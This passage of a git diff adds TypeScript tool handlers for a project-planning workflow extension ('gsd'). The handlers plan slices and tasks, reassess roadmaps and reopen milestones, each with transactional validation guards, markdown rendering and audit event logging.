+  } catch (renderErr) {
+    logWarning("tool", `plan_milestone — render failed (DB rows preserved for debugging): ${(renderErr as Error).message}`);
+    invalidateStateCache();
+    return { error: `render failed: ${(renderErr as Error).message}` };
+  }
+
+  invalidateStateCache();
+  clearParseCache();
+
+  // ── Post-mutation hook: projections, manifest, event log ───────────────
+  try {
+    await renderAllProjections(basePath, params.milestoneId);
+    writeManifest(basePath);
+    appendEvent(basePath, {
+      cmd: "plan-milestone",
+      params: { milestoneId: params.milestoneId },
+      ts: new Date().toISOString(),
+      actor: "agent",
+      actor_name: params.actorName,
+      trigger_reason: params.triggerReason,
+    });
+  } catch (hookErr) {
+    logWarning("tool", `plan-milestone post-mutation hook warning: ${(hookErr as Error).message}`);
+  }
+
+  return {
+    milestoneId: params.milestoneId,
+    roadmapPath,
+  };
+}
diff --git a/src/resources/extensions/gsd/tools/plan-slice.ts b/src/resources/extensions/gsd/tools/plan-slice.ts
new file mode 100644
index 000000000..8324bdc82
--- /dev/null
+++ b/src/resources/extensions/gsd/tools/plan-slice.ts
@@ -0,0 +1,252 @@
+import { clearParseCache } from "../files.js";
+import { isClosedStatus } from "../status-guards.js";
+import { isNonEmptyString, validateStringArray } from "../validation.js";
+import {
+  transaction,
+  getMilestone,
+  getSlice,
+  insertTask,
+  upsertSlicePlanning,
+  upsertTaskPlanning,
+  insertGateRow,
+} from "../gsd-db.js";
+import type { GateId } from "../types.js";
+import { invalidateStateCache } from "../state.js";
+import { renderPlanFromDb } from "../markdown-renderer.js";
+import { renderAllProjections } from "../workflow-projections.js";
+import { writeManifest } from "../workflow-manifest.js";
+import { appendEvent } from "../workflow-events.js";
+import { logWarning } from "../workflow-logger.js";
+
+export interface PlanSliceTaskInput {
+  taskId: string;
+  title: string;
+  description: string;
+  estimate: string;
+  files: string[];
+  verify: string;
+  inputs: string[];
+  expectedOutput: string[];
+  observabilityImpact?: string;
+  fullPlanMd?: string;
+}
+
+export interface PlanSliceParams {
+  milestoneId: string;
+  sliceId: string;
+  goal: string;
+  tasks: PlanSliceTaskInput[];
+  /** @optional — defaults to "Not provided." when omitted by models with limited tool-calling */
+  successCriteria?: string;
+  /** @optional — defaults to "Not provided." when omitted */
+  proofLevel?: string;
+  /** @optional — defaults to "Not provided." when omitted */
+  integrationClosure?: string;
+  /** @optional — defaults to "Not provided." when omitted */
+  observabilityImpact?: string;
+  /** Optional caller-provided identity for audit trail */
+  actorName?: string;
+  /** Optional caller-provided reason this action was triggered */
+  triggerReason?: string;
+}
+
+export interface PlanSliceResult {
+  milestoneId: string;
+  sliceId: string;
+  planPath: string;
+  taskPlanPaths: string[];
+}
+
+function validateTasks(value: unknown): PlanSliceTaskInput[] {
+  if (!Array.isArray(value) || value.length === 0) {
+    throw new Error("tasks must be a non-empty array");
+  }
+
+  const seen = new Set<string>();
+  return value.map((entry, index) => {
+    if (!entry || typeof entry !== "object") {
+      throw new Error(`tasks[${index}] must be an object`);
+    }
+    const obj = entry as Record<string, unknown>;
+    const taskId = obj.taskId;
+    const title = obj.title;
+    const description = obj.description;
+    const estimate = obj.estimate;
+    const files = obj.files;
+    const verify = obj.verify;
+    const inputs = obj.inputs;
+    const expectedOutput = obj.expectedOutput;
+    const observabilityImpact = obj.observabilityImpact;
+
+    if (!isNonEmptyString(taskId)) throw new Error(`tasks[${index}].taskId must be a non-empty string`);
+    if (seen.has(taskId)) throw new Error(`tasks[${index}].taskId must be unique`);
+    seen.add(taskId);
+    if (!isNonEmptyString(title)) throw new Error(`tasks[${index}].title must be a non-empty string`);
+    if (!isNonEmptyString(description)) throw new Error(`tasks[${index}].description must be a non-empty string`);
+    if (!isNonEmptyString(estimate)) throw new Error(`tasks[${index}].estimate must be a non-empty string`);
+    if (!Array.isArray(files) || files.some((item) => !isNonEmptyString(item))) {
+      throw new Error(`tasks[${index}].files must be an array of non-empty strings`);
+    }
+    if (!isNonEmptyString(verify)) throw new Error(`tasks[${index}].verify must be a non-empty string`);
+    if (!Array.isArray(inputs) || inputs.some((item) => !isNonEmptyString(item))) {
+      throw new Error(`tasks[${index}].inputs must be an array of non-empty strings`);
+    }
+    if (!Array.isArray(expectedOutput) || expectedOutput.some((item) => !isNonEmptyString(item))) {
+      throw new Error(`tasks[${index}].expectedOutput must be an array of non-empty strings`);
+    }
+    if (observabilityImpact !== undefined && !isNonEmptyString(observabilityImpact)) {
+      throw new Error(`tasks[${index}].observabilityImpact must be a non-empty string when provided`);
+    }
+
+    return {
+      taskId,
+      title,
+      description,
+      estimate,
+      files,
+      verify,
+      inputs,
+      expectedOutput,
+      observabilityImpact: typeof observabilityImpact === "string" ? observabilityImpact : "",
+    };
+  });
+}
+
+function validateParams(params: PlanSliceParams): PlanSliceParams {
+  if (!isNonEmptyString(params?.milestoneId)) throw new Error("milestoneId is required");
+  if (!isNonEmptyString(params?.sliceId)) throw new Error("sliceId is required");
+  if (!isNonEmptyString(params?.goal)) throw new Error("goal is required");
+
+  return {
+    ...params,
+    // Apply defaults for optional enrichment fields (#2771)
+    successCriteria: params.successCriteria ?? "Not provided.",
+    proofLevel: params.proofLevel ?? "Not provided.",
+    integrationClosure: params.integrationClosure ?? "Not provided.",
+    observabilityImpact: params.observabilityImpact ?? "Not provided.",
+    tasks: validateTasks(params.tasks),
+  };
+}
+
+export async function handlePlanSlice(
+  rawParams: PlanSliceParams,
+  basePath: string,
+): Promise<PlanSliceResult | { error: string }> {
+  let params: PlanSliceParams;
+  try {
+    params = validateParams(rawParams);
+  } catch (err) {
+    return { error: `validation failed: ${(err as Error).message}` };
+  }
+
+  // ── Guards + DB writes inside a single transaction (prevents TOCTOU) ───
+  // Guards must be inside the transaction so the state they check cannot
+  // change between the read and the write (#2723).
+  let guardError: string | null = null;
+
+  try {
+    transaction(() => {
+      const parentMilestone = getMilestone(params.milestoneId);
+      if (!parentMilestone) {
+        guardError = `milestone not found: ${params.milestoneId}`;
+        return;
+      }
+      if (isClosedStatus(parentMilestone.status)) {
+        guardError = `cannot plan slice in a closed milestone: ${params.milestoneId} (status: ${parentMilestone.status})`;
+        return;
+      }
+
+      const parentSlice = getSlice(params.milestoneId, params.sliceId);
+      if (!parentSlice) {
+        guardError = `missing parent slice: ${params.milestoneId}/${params.sliceId}`;
+        return;
+      }
+      if (isClosedStatus(parentSlice.status)) {
+        guardError = `cannot re-plan slice ${params.sliceId}: it is already complete — use gsd_slice_reopen first`;
+        return;
+      }
+
+      upsertSlicePlanning(params.milestoneId, params.sliceId, {
+        goal: params.goal,
+        successCriteria: params.successCriteria,
+        proofLevel: params.proofLevel,
+        integrationClosure: params.integrationClosure,
+        observabilityImpact: params.observabilityImpact,
+      });
+
+      for (const task of params.tasks) {
+        insertTask({
+          id: task.taskId,
+          sliceId: params.sliceId,
+          milestoneId: params.milestoneId,
+          title: task.title,
+          status: "pending",
+        });
+        upsertTaskPlanning(params.milestoneId, params.sliceId, task.taskId, {
+          title: task.title,
+          description: task.description,
+          estimate: task.estimate,
+          files: task.files,
+          verify: task.verify,
+          inputs: task.inputs,
+          expectedOutput: task.expectedOutput,
+          observabilityImpact: task.observabilityImpact ?? "",
+          fullPlanMd: task.fullPlanMd,
+        });
+      }
+
+      // Seed quality gate rows inside the transaction — all-or-nothing with
+      // the plan data so a crash can't leave orphaned gates without tasks.
+      const sliceGates: GateId[] = ["Q3", "Q4"];
+      for (const gid of sliceGates) {
+        insertGateRow({ milestoneId: params.milestoneId, sliceId: params.sliceId, gateId: gid, scope: "slice" });
+      }
+      const taskGates: GateId[] = ["Q5", "Q6", "Q7"];
+      for (const task of params.tasks) {
+        for (const gid of taskGates) {
+          insertGateRow({ milestoneId: params.milestoneId, sliceId: params.sliceId, gateId: gid, scope: "task", taskId: task.taskId });
+        }
+      }
+      insertGateRow({ milestoneId: params.milestoneId, sliceId: params.sliceId, gateId: "Q8", scope: "slice" });
+    });
+  } catch (err) {
+    return { error: `db write failed: ${(err as Error).message}` };
+  }
+
+  if (guardError) {
+    return { error: guardError };
+  }
+
+  try {
+    const renderResult = await renderPlanFromDb(basePath, params.milestoneId, params.sliceId);
+    invalidateStateCache();
+    clearParseCache();
+
+    // ── Post-mutation hook: projections, manifest, event log ─────────────
+    try {
+      await renderAllProjections(basePath, params.milestoneId);
+      writeManifest(basePath);
+      appendEvent(basePath, {
+        cmd: "plan-slice",
+        params: { milestoneId: params.milestoneId, sliceId: params.sliceId },
+        ts: new Date().toISOString(),
+        actor: "agent",
+        actor_name: params.actorName,
+        trigger_reason: params.triggerReason,
+      });
+    } catch (hookErr) {
+      logWarning("tool", `plan-slice post-mutation hook warning: ${(hookErr as Error).message}`);
+    }
+
+    return {
+      milestoneId: params.milestoneId,
+      sliceId: params.sliceId,
+      planPath: renderResult.planPath,
+      taskPlanPaths: renderResult.taskPlanPaths,
+    };
+  } catch (renderErr) {
+    logWarning("tool", `plan_slice — render failed (DB rows preserved for debugging): ${(renderErr as Error).message}`);
+    invalidateStateCache();
+    return { error: `render failed: ${(renderErr as Error).message}` };
+  }
+}
diff --git a/src/resources/extensions/gsd/tools/plan-task.ts b/src/resources/extensions/gsd/tools/plan-task.ts
new file mode 100644
index 000000000..329ab6cd4
--- /dev/null
+++ b/src/resources/extensions/gsd/tools/plan-task.ts
@@ -0,0 +1,151 @@
+import { clearParseCache } from "../files.js";
+import { isClosedStatus } from "../status-guards.js";
+import { isNonEmptyString, validateStringArray } from "../validation.js";
+import { transaction, getSlice, getTask, insertTask, upsertTaskPlanning } from "../gsd-db.js";
+import { invalidateStateCache } from "../state.js";
+import { renderTaskPlanFromDb } from "../markdown-renderer.js";
+import { renderAllProjections } from "../workflow-projections.js";
+import { writeManifest } from "../workflow-manifest.js";
+import { appendEvent } from "../workflow-events.js";
+import { logWarning } from "../workflow-logger.js";
+
+export interface PlanTaskParams {
+  milestoneId: string;
+  sliceId: string;
+  taskId: string;
+  title: string;
+  description: string;
+  estimate: string;
+  files: string[];
+  verify: string;
+  inputs: string[];
+  expectedOutput: string[];
+  observabilityImpact?: string;
+  fullPlanMd?: string;
+  /** Optional caller-provided identity for audit trail */
+  actorName?: string;
+  /** Optional caller-provided reason this action was triggered */
+  triggerReason?: string;
+}
+
+export interface PlanTaskResult {
+  milestoneId: string;
+  sliceId: string;
+  taskId: string;
+  taskPlanPath: string;
+}
+
+function validateParams(params: PlanTaskParams): PlanTaskParams {
+  if (!isNonEmptyString(params?.milestoneId)) throw new Error("milestoneId is required");
+  if (!isNonEmptyString(params?.sliceId)) throw new Error("sliceId is required");
+  if (!isNonEmptyString(params?.taskId)) throw new Error("taskId is required");
+  if (!isNonEmptyString(params?.title)) throw new Error("title is required");
+  if (!isNonEmptyString(params?.description)) throw new Error("description is required");
+  if (!isNonEmptyString(params?.estimate)) throw new Error("estimate is required");
+  if (!isNonEmptyString(params?.verify)) throw new Error("verify is required");
+  if (params.observabilityImpact !== undefined && !isNonEmptyString(params.observabilityImpact)) {
+    throw new Error("observabilityImpact must be a non-empty string when provided");
+  }
+
+  return {
+    ...params,
+    files: validateStringArray(params.files, "files"),
+    inputs: validateStringArray(params.inputs, "inputs"),
+    expectedOutput: validateStringArray(params.expectedOutput, "expectedOutput"),
+  };
+}
+
+export async function handlePlanTask(
+  rawParams: PlanTaskParams,
+  basePath: string,
+): Promise<PlanTaskResult | { error: string }> {
+  let params: PlanTaskParams;
+  try {
+    params = validateParams(rawParams);
+  } catch (err) {
+    return { error: `validation failed: ${(err as Error).message}` };
+  }
+
+  // ── Guards + DB writes inside a single transaction (prevents TOCTOU) ───
+  // Guards must be inside the transaction so the state they check cannot
+  // change between the read and the write (#2723).
+  let guardError: string | null = null;
+
+  try {
+    transaction(() => {
+      const parentSlice = getSlice(params.milestoneId, params.sliceId);
+      if (!parentSlice) {
+        guardError = `missing parent slice: ${params.milestoneId}/${params.sliceId}`;
+        return;
+      }
+      if (isClosedStatus(parentSlice.status)) {
+        guardError = `cannot plan task in a closed slice: ${params.sliceId} (status: ${parentSlice.status})`;
+        return;
+      }
+
+      const existingTask = getTask(params.milestoneId, params.sliceId, params.taskId);
+      if (existingTask && isClosedStatus(existingTask.status)) {
+        guardError = `cannot re-plan task ${params.taskId}: it is already complete — use gsd_task_reopen first`;
+        return;
+      }
+
+      if (!existingTask) {
+        insertTask({
+          id: params.taskId,
+          sliceId: params.sliceId,
+          milestoneId: params.milestoneId,
+          title: params.title,
+          status: "pending",
+        });
+      }
+      upsertTaskPlanning(params.milestoneId, params.sliceId, params.taskId, {
+        title: params.title,
+        description: params.description,
+        estimate: params.estimate,
+        files: params.files,
+        verify: params.verify,
+        inputs: params.inputs,
+        expectedOutput: params.expectedOutput,
+        observabilityImpact: params.observabilityImpact ?? "",
+        fullPlanMd: params.fullPlanMd,
+      });
+    });
+  } catch (err) {
+    return { error: `db write failed: ${(err as Error).message}` };
+  }
+
+  if (guardError) {
+    return { error: guardError };
+  }
+
+  try {
+    const renderResult = await renderTaskPlanFromDb(basePath, params.milestoneId, params.sliceId, params.taskId);
+    invalidateStateCache();
+    clearParseCache();
+
+    // ── Post-mutation hook: projections, manifest, event log ─────────────
+    try {
+      await renderAllProjections(basePath, params.milestoneId);
+      writeManifest(basePath);
+      appendEvent(basePath, {
+        cmd: "plan-task",
+        params: { milestoneId: params.milestoneId, sliceId: params.sliceId, taskId: params.taskId },
+        ts: new Date().toISOString(),
+        actor: "agent",
+        actor_name: params.actorName,
+        trigger_reason: params.triggerReason,
+      });
+    } catch (hookErr) {
+      logWarning("tool", `plan-task post-mutation hook warning: ${(hookErr as Error).message}`);
+    }
+
+    return {
+      milestoneId: params.milestoneId,
+      sliceId: params.sliceId,
+      taskId: params.taskId,
+      taskPlanPath: renderResult.taskPlanPath,
+    };
+  } catch (err) {
+    return { error: `render failed: ${(err as Error).message}` };
+  }
+}
diff --git a/src/resources/extensions/gsd/tools/reassess-roadmap.ts b/src/resources/extensions/gsd/tools/reassess-roadmap.ts
new file mode 100644
index 000000000..ab0f492fa
--- /dev/null
+++ b/src/resources/extensions/gsd/tools/reassess-roadmap.ts
@@ -0,0 +1,289 @@
+import { join } from "node:path";
+import { existsSync, unlinkSync } from "node:fs";
+import { clearParseCache } from "../files.js";
+import { isClosedStatus } from "../status-guards.js";
+import { isNonEmptyString } from "../validation.js";
+import {
+  transaction,
+  getMilestone,
+  getMilestoneSlices,
+  getSlice,
+  insertSlice,
+  updateSliceFields,
+  insertAssessment,
+  deleteAssessmentByScope,
+  deleteSlice,
+} from "../gsd-db.js";
+import { invalidateStateCache } from "../state.js";
+import { renderRoadmapFromDb, renderAssessmentFromDb } from "../markdown-renderer.js";
+import { renderAllProjections } from "../workflow-projections.js";
+import { writeManifest } from "../workflow-manifest.js";
+import { appendEvent } from "../workflow-events.js";
+import { logWarning } from "../workflow-logger.js";
+
+export interface SliceChangeInput {
+  sliceId: string;
+  title: string;
+  risk?: string;
+  depends?: string[];
+  demo?: string;
+}
+
+export interface ReassessRoadmapParams {
+  milestoneId: string;
+  completedSliceId: string;
+  verdict: string;
+  assessment: string;
+  sliceChanges: {
+    modified: SliceChangeInput[];
+    added: SliceChangeInput[];
+    removed: string[];
+  };
+  /** Optional caller-provided identity for audit trail */
+  actorName?: string;
+  /** Optional caller-provided reason this action was triggered */
+  triggerReason?: string;
+}
+
+export interface ReassessRoadmapResult {
+  milestoneId: string;
+  completedSliceId: string;
+  assessmentPath: string;
+  roadmapPath: string;
+}
+
+
+function validateParams(params: ReassessRoadmapParams): ReassessRoadmapParams {
+  if (!isNonEmptyString(params?.milestoneId)) throw new Error("milestoneId is required");
+  if (!isNonEmptyString(params?.completedSliceId)) throw new Error("completedSliceId is required");
+  if (!isNonEmptyString(params?.verdict)) throw new Error("verdict is required");
+  if (!isNonEmptyString(params?.assessment)) throw new Error("assessment is required");
+
+  if (!params.sliceChanges || typeof params.sliceChanges !== "object") {
+    throw new Error("sliceChanges must be an object");
+  }
+
+  if (!Array.isArray(params.sliceChanges.modified)) {
+    throw new Error("sliceChanges.modified must be an array");
+  }
+
+  if (!Array.isArray(params.sliceChanges.added)) {
+    throw new Error("sliceChanges.added must be an array");
+  }
+
+  if (!Array.isArray(params.sliceChanges.removed)) {
+    throw new Error("sliceChanges.removed must be an array");
+  }
+
+  // Validate each modified slice
+  for (let i = 0; i < params.sliceChanges.modified.length; i++) {
+    const s = params.sliceChanges.modified[i];
+    if (!s || typeof s !== "object") throw new Error(`sliceChanges.modified[${i}] must be an object`);
+    if (!isNonEmptyString(s.sliceId)) throw new Error(`sliceChanges.modified[${i}].sliceId is required`);
+    if (!isNonEmptyString(s.title)) throw new Error(`sliceChanges.modified[${i}].title is required`);
+  }
+
+  // Validate each added slice
+  for (let i = 0; i < params.sliceChanges.added.length; i++) {
+    const s = params.sliceChanges.added[i];
+    if (!s || typeof s !== "object") throw new Error(`sliceChanges.added[${i}] must be an object`);
+    if (!isNonEmptyString(s.sliceId)) throw new Error(`sliceChanges.added[${i}].sliceId is required`);
+    if (!isNonEmptyString(s.title)) throw new Error(`sliceChanges.added[${i}].title is required`);
+  }
+
+  return params;
+}
+
+export async function handleReassessRoadmap(
+  rawParams: ReassessRoadmapParams,
+  basePath: string,
+): Promise<ReassessRoadmapResult | { error: string }> {
+  // ── Validate ──────────────────────────────────────────────────────
+  let params: ReassessRoadmapParams;
+  try {
+    params = validateParams(rawParams);
+  } catch (err) {
+    return { error: `validation failed: ${(err as Error).message}` };
+  }
+
+  // ── Compute assessment artifact path ──────────────────────────────
+  // Assessment lives in the completed slice's directory
+  const assessmentRelPath = join(
+    ".gsd", "milestones", params.milestoneId,
+    "slices", params.completedSliceId,
+    `${params.completedSliceId}-ASSESSMENT.md`,
+  );
+
+  // ── Guards + DB writes inside a single transaction (prevents TOCTOU) ───
+  // Guards must be inside the transaction so the state they check cannot
+  // change between the read and the write (#2723).
+  let guardError: string | null = null;
+
+  try {
+    transaction(() => {
+      // Verify milestone exists and is active
+      const milestone = getMilestone(params.milestoneId);
+      if (!milestone) {
+        guardError = `milestone not found: ${params.milestoneId}`;
+        return;
+      }
+      if (isClosedStatus(milestone.status)) {
+        guardError = `cannot reassess a closed milestone: ${params.milestoneId} (status: ${milestone.status})`;
+        return;
+      }
+
+      // Verify completedSliceId is actually complete
+      const completedSlice = getSlice(params.milestoneId, params.completedSliceId);
+      if (!completedSlice) {
+        guardError = `completedSliceId not found: ${params.milestoneId}/${params.completedSliceId}`;
+        return;
+      }
+      if (!isClosedStatus(completedSlice.status)) {
+        guardError = `completedSliceId ${params.completedSliceId} is not complete (status: ${completedSlice.status}) — reassess can only be called after a slice finishes`;
+        return;
+      }
+
+      // Structural enforcement — reject modifications/removal of completed slices
+      const existingSlices = getMilestoneSlices(params.milestoneId);
+      const completedSliceIds = new Set<string>();
+      for (const slice of existingSlices) {
+        if (isClosedStatus(slice.status)) {
+          completedSliceIds.add(slice.id);
+        }
+      }
+
+      for (const modifiedSlice of params.sliceChanges.modified) {
+        if (completedSliceIds.has(modifiedSlice.sliceId)) {
+          guardError = `cannot modify completed slice ${modifiedSlice.sliceId}`;
+          return;
+        }
+      }
+
+      for (const removedId of params.sliceChanges.removed) {
+        if (completedSliceIds.has(removedId)) {
+          guardError = `cannot remove completed slice ${removedId}`;
+          return;
+        }
+      }
+
+      // Record assessment
+      insertAssessment({
+        path: assessmentRelPath,
+        milestoneId: params.milestoneId,
+        sliceId: params.completedSliceId,
+        status: params.verdict,
+        scope: "roadmap",
+        fullContent: params.assessment,
+      });
+
+      // Apply slice modifications
+      for (const mod of params.sliceChanges.modified) {
+        updateSliceFields(params.milestoneId, mod.sliceId, {
+          title: mod.title,
+          risk: mod.risk,
+          depends: mod.depends,
+          demo: mod.demo,
+        });
+      }
+
+      // Insert new slices — assign sequence after existing slices (#3356)
+      const existingCount = getMilestoneSlices(params.milestoneId).length;
+      for (let i = 0; i < params.sliceChanges.added.length; i++) {
+        const added = params.sliceChanges.added[i]!;
+        insertSlice({
+          id: added.sliceId,
+          milestoneId: params.milestoneId,
+          title: added.title,
+          status: "pending",
+          risk: added.risk,
+          depends: added.depends,
+          demo: added.demo ?? "",
+          sequence: existingCount + i + 1,
+        });
+      }
+
+      // Delete removed slices
+      for (const removedId of params.sliceChanges.removed) {
+        deleteSlice(params.milestoneId, removedId);
+      }
+
+      // ── Invalidate stale milestone validation (#2957) ──────────────
+      // When roadmap structure changes (slices added/modified/removed),
+      // any prior milestone-validation verdict is stale. Delete the DB
+      // row so deriveState() returns phase: 'validating-milestone' once
+      // the new slices complete, rather than advancing directly to
+      // 'completing-milestone' with a stale needs-remediation verdict.
+      const hasStructuralChanges =
+        params.sliceChanges.added.length > 0 ||
+        params.sliceChanges.modified.length > 0 ||
+        params.sliceChanges.removed.length > 0;
+
+      if (hasStructuralChanges) {
+        deleteAssessmentByScope(params.milestoneId, "milestone-validation");
+      }
+    });
+  } catch (err) {
+    return { error: `db write failed: ${(err as Error).message}` };
+  }
+
+  if (guardError) {
+    return { error: guardError };
+  }
+
+  // ── Render artifacts ──────────────────────────────────────────────
+  try {
+    const roadmapResult = await renderRoadmapFromDb(basePath, params.milestoneId);
+    const assessmentResult = await renderAssessmentFromDb(basePath, params.milestoneId, params.completedSliceId, {
+      verdict: params.verdict,
+      assessment: params.assessment,
+      completedSliceId: params.completedSliceId,
+    });
+
+    // ── Remove stale VALIDATION file from disk (#2957) ────────────
+    const hasStructuralChanges =
+      params.sliceChanges.added.length > 0 ||
+      params.sliceChanges.modified.length > 0 ||
+      params.sliceChanges.removed.length > 0;
+
+    if (hasStructuralChanges) {
+      const validationFile = join(
+        basePath, ".gsd", "milestones", params.milestoneId,
+        `${params.milestoneId}-VALIDATION.md`,
+      );
+      try {
+        if (existsSync(validationFile)) unlinkSync(validationFile);
+      } catch (e) {
+        logWarning("tool", `validation file cleanup failed: ${(e as Error).message}`);
+      }
+    }
+
+    // ── Invalidate caches ─────────────────────────────────────────
+    invalidateStateCache();
+    clearParseCache();
+
+    // ── Post-mutation hook: projections, manifest, event log ─────
+    try {
+      await renderAllProjections(basePath, params.milestoneId);
+      writeManifest(basePath);
+      appendEvent(basePath, {
+        cmd: "reassess-roadmap",
+        params: { milestoneId: params.milestoneId, completedSliceId: params.completedSliceId },
+        ts: new Date().toISOString(),
+        actor: "agent",
+        actor_name: params.actorName,
+        trigger_reason: params.triggerReason,
+      });
+    } catch (hookErr) {
+      logWarning("tool", `reassess-roadmap post-mutation hook warning: ${(hookErr as Error).message}`);
+    }
+
+    return {
+      milestoneId: params.milestoneId,
+      completedSliceId: params.completedSliceId,
+      assessmentPath: assessmentResult.assessmentPath,
+      roadmapPath: roadmapResult.roadmapPath,
+    };
+  } catch (err) {
+    return { error: `render failed: ${(err as Error).message}` };
+  }
+}
diff --git a/src/resources/extensions/gsd/tools/reopen-milestone.ts b/src/resources/extensions/gsd/tools/reopen-milestone.ts
new file mode 100644
index 000000000..d2e67ac3e
--- /dev/null
+++ b/src/resources/extensions/gsd/tools/reopen-milestone.ts
@@ -0,0 +1,152 @@
+// GSD — reopen-milestone tool handler
+
+/**
+ * reopen-milestone handler — the core operation behind gsd_milestone_reopen.
+ *
+ * Resets a closed milestone back to "active", all of its slices to
+ * "in_progress", and all tasks to "pending". Cleans up stale filesystem
+ * artifacts so the DB-filesystem reconciler does not auto-correct
+ * entities back to "complete".
+ */
+
+import {
+  getMilestone,
+  getMilestoneSlices,
+  getSliceTasks,
+  updateMilestoneStatus,
+  updateSliceStatus,
+  updateTaskStatus,
+  transaction,
+} from "../gsd-db.js";
+import { invalidateStateCache } from "../state.js";
+import { isClosedStatus } from "../status-guards.js";
+import { renderAllProjections } from "../workflow-projections.js";
+import { writeManifest } from "../workflow-manifest.js";
+import { appendEvent } from "../workflow-events.js";
+import { logWarning } from "../workflow-logger.js";
+import { debugLog } from "../debug-logger.js";
+import { existsSync, unlinkSync } from "node:fs";
+import { join } from "node:path";
+import { resolveMilestonePath, resolveSlicePath, resolveTasksDir, clearPathCache } from "../paths.js";
+
+export interface ReopenMilestoneParams {
+  milestoneId: string;
+  reason?: string;
+  /** Optional caller-provided identity for audit trail */
+  actorName?: string;
+  /** Optional caller-provided reason this action was triggered */
+  triggerReason?: string;
+}
+
+export interface ReopenMilestoneResult {
+  milestoneId: string;
+  slicesReset: number;
+  tasksReset: number;
+}
+
+export async function handleReopenMilestone(
+  params: ReopenMilestoneParams,
+  basePath: string,
+): Promise<ReopenMilestoneResult | { error: string }> {
+  // ── Validate required fields ────────────────────────────────────────────
+  if (!params.milestoneId || typeof params.milestoneId !== "string" || params.milestoneId.trim() === "") {
+    return { error: "milestoneId is required and must be a non-empty string" };
+  }
+
+  // ── Guards + DB writes inside a single transaction (prevents TOCTOU) ───
+  let guardError: string | null = null;
+  let slicesResetCount = 0;
+  let tasksResetCount = 0;
+
+  transaction(() => {
+    const milestone = getMilestone(params.milestoneId);
+    if (!milestone) {
+      guardError = `milestone not found: ${params.milestoneId}`;
+      return;
+    }
+    if (!isClosedStatus(milestone.status)) {
+      guardError = `milestone ${params.milestoneId} is not closed (status: ${milestone.status}) — nothing to reopen`;
+      return;
+    }
+
+    updateMilestoneStatus(params.milestoneId, "active", null);
+
+    const slices = getMilestoneSlices(params.milestoneId);
+    slicesResetCount = slices.length;
+
+    for (const slice of slices) {
+      updateSliceStatus(params.milestoneId, slice.id, "in_progress");
+      const tasks = getSliceTasks(params.milestoneId, slice.id);
+      tasksResetCount += tasks.length;
+      for (const task of tasks) {
+        updateTaskStatus(params.milestoneId, slice.id, task.id, "pending");
+      }
+    }
+  });
+
+  if (guardError) {
+    return { error: guardError };
+  }
+
+  // ── Invalidate caches ────────────────────────────────────────────────────
+  invalidateStateCache();
+
+  // ── Clean up stale filesystem artifacts (M12 fix) ────────────────────────
+  // Without this, the DB-filesystem reconciler sees SUMMARY.md files and
+  // auto-corrects entities back to "complete", making reopen a no-op (#3161).
+  try {
+    const milestoneDir = resolveMilestonePath(basePath, params.milestoneId);
+    if (milestoneDir) {
+      const milestoneSummary = join(milestoneDir, `${params.milestoneId}-SUMMARY.md`);
+      if (existsSync(milestoneSummary)) unlinkSync(milestoneSummary);
+    }
+
+    const slices = getMilestoneSlices(params.milestoneId);
+    for (const slice of slices) {
+      const sliceDir = resolveSlicePath(basePath, params.milestoneId, slice.id);
+      if (sliceDir) {
+        const sliceSummary = join(sliceDir, `${slice.id}-SUMMARY.md`);
+        if (existsSync(sliceSummary)) unlinkSync(sliceSummary);
+        const sliceUat = join(sliceDir, `${slice.id}-UAT.md`);
+        if (existsSync(sliceUat)) unlinkSync(sliceUat);
+      }
+
+      const tasksDir = resolveTasksDir(basePath, params.milestoneId, slice.id);
+      if (tasksDir) {
+        const tasks = getSliceTasks(params.milestoneId, slice.id);
+        for (const task of tasks) {
+          const taskSummary = join(tasksDir, `${task.id}-SUMMARY.md`);
+          if (existsSync(taskSummary)) unlinkSync(taskSummary);
+        }
+      }
+    }
+  } catch (err) { debugLog("reopen-milestone-cleanup-failed", { milestoneId: params.milestoneId, error: String(err) }); }
+  clearPathCache();
+
+  // ── Post-mutation hook ───────────────────────────────────────────────────
+  try {
+    await renderAllProjections(basePath, params.milestoneId);
+    writeManifest(basePath);
+    appendEvent(basePath, {
+      cmd: "reopen-milestone",
+      params: {
+        milestoneId: params.milestoneId,
+        reason: params.reason ?? null,
+        slicesReset: slicesResetCount,
+        tasksReset: tasksResetCount,
+      },
+      ts: new Date().toISOString(),
+      actor: "agent",
+      actor_name: params.actorName,
+      trigger_reason: params.triggerReason,
+    });
+  } catch (hookErr) {
+    logWarning("tool", `reopen-milestone post-mutation hook warning: ${(hookErr as Error).message}`);
+  }
+
+  return {
+    milestoneId: params.milestoneId,
+    slicesReset: slicesResetCount,
+    tasksReset: tasksResetCount,
+  };
+}
diff --git a/src/resources/extensions/gsd/tools/reopen-slice.ts b/src/resources/extensions/gsd/tools/reopen-slice.ts
new file mode 100644
index 000000000..f03a4905e
--- /dev/null
+++ b/src/resources/extensions/gsd/tools/reopen-slice.ts
@@ -0,0 +1,152 @@
+/**
+ * reopen-slice handler — the core operation behind gsd_slice_reopen.
+ *
+ * Resets a completed slice back to "in_progress" and resets ALL of its
+ * tasks back to "pending". This is intentional — if you're reopening a
+ * slice, you're re-doing the work. Partial resets create ambiguous state.
+ *
+ * The parent milestone must still be open (not complete).
+ */
+
+// GSD — reopen-slice tool handler
+// Copyright (c) 2026 Jeremy McSpadden <jeremy@fluxlabs.net>
+
+import {
+  getMilestone,
+  getSlice,
+  getSliceTasks,
+  updateSliceStatus,
+  updateTaskStatus,
+  transaction,
+} from "../gsd-db.js";
+import { invalidateStateCache } from "../state.js";
+import { isClosedStatus } from "../status-guards.js";
+import { renderAllProjections } from "../workflow-projections.js";
+import { writeManifest } from "../workflow-manifest.js";
+import { appendEvent } from "../workflow-events.js";
+import { logWarning } from "../workflow-logger.js";
+import { existsSync, unlinkSync } from "node:fs";
+import { join } from "node:path";
+import { resolveTasksDir, resolveSlicePath, clearPathCache } from "../paths.js";
+
+export interface ReopenSliceParams {
+  milestoneId: string;
+  sliceId: string;
+  reason?: string;
+  /** Optional caller-provided identity for audit trail */
+  actorName?: string;
+  /** Optional caller-provided reason this action was triggered */
+  triggerReason?: string;
+}
+
+export interface ReopenSliceResult {
+  milestoneId: string;
+  sliceId: string;
+  tasksReset: number;
+}
+
+export async function handleReopenSlice(
+  params: ReopenSliceParams,
+  basePath: string,
+): Promise<ReopenSliceResult | { error: string }> {
+  // ── Validate required fields ────────────────────────────────────────────
+  if (!params.sliceId || typeof params.sliceId !== "string" || params.sliceId.trim() === "") {
+    return { error: "sliceId is required and must be a non-empty string" };
+  }
